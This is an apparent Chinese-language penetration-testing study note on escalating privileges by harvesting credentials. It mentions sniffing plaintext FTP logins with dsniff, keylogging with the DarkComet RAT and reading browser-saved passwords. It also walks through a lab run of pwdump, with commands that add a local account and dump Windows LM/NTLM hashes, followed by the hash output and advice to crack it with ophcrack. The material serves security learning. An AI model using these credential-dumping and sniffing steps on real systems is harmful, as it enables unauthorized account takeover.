前言
之前提到了要提升权限
方法很多上节学的是本地的一些方法
这节主要通过抓包来实现提权
1、抓包工具
Windows:
- Wireshark
- Omnipeek
- Commview
- Sniffpass:抓取密码相关的数据包
Linux:
- Tcpdump
- Wireshark
- Dsniff:抓取密码相关的数据包
最简单:dsniff -i eth0
只要有人ftp连接过来,就会抓取账号密码
只能抓明文
2、木马软件
木马显然是可以用的(不知道会不会被和谐)
反正这里就提一嘴
如 DarkCometRAT
在控制目标主机之后可以监控键盘记录信息
3、本地缓存密码
通过浏览器查看保存的账号密码
这个找找就有了
如果目标机都让浏览器保存密码的话
显然舒服的很
另外提供一个网站
windows密码恢复工具
http://www.nirsoft.net/password_recovery_tools.html
4、pwdump
kali:
cd /usr/share/windows-binaries/
cp fgdump/ -R /media/sf_D_DRIVE/ #拷贝到windows中
windows:
C:\Documents and Settings\kevin>net user user2 123456 /add #添加一个user2账号,密码123456
C:\Documents and Settings\kevin>net user
\\ICST-WINATT 的用户帐户
-------------------------------------------------------------
Administrator Guest HelpAssistant
kevin SUPPORT_388945a0 test
user1 user2
C:\Documents and Settings\kevin>cd \
C:\>PwDump.exe localhost
Administrator:500:18D583B495C4696AFF17365FAF1FFE89:5D36F0CA14EEBEF32F55C7B6A4675DB0:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
HelpAssistant:1000:5906F3A72959D5902440275BA555A537:10AA20D63C3EC71E0102AC95ADF6DF73:::
kevin:1004:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
SUPPORT_388945a0:1002:NO PASSWORD*********************:8AFA81401E8D8EBFA42B4E46F6507C07:::
test:1005:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
user1:1006:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
user2:1007:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::Completed.
# 结果:前部分是 LMHASH ,后部分是 NTLMHASH
#admin的sid一般都是500
#得到账密码的密文形式(哈希算法)
copy到kali里破解
比如ophcrack就可以破解简单的哈希加密
结语
抓包就完事了